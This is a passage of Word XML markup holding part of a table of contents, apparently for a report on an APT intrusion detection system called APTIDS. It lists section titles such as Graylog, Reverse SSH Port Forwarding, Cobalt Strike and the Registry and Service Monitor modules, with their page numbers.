              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303719" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2</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Windows Service</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303719 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303720" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3</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Graylog</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303720 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303721" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.4</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Reverse SSH Port Forwarding</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303721 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303722" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.5</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Cobalt Strike</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303722 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303723" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.6</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External Knowledge</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303723 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303724" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 3.</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PROJECT ARCHITECTURE</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303724 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303725" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</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APTIDS’s overall architecture</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303725 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303726" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</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Registry Monitor Module</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303726 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303727" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1</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Registry Monitor Architecture</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303727 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303728" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2</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Registry Monitor Workflow</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303728 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303729" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3</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Identifying Registry Change</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303729 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303730" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</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Service Monitor Module</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303730 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303731" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1</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Service Monitor Architecture</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303731 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303732" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2</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Service Monitor Workflows</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303732 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
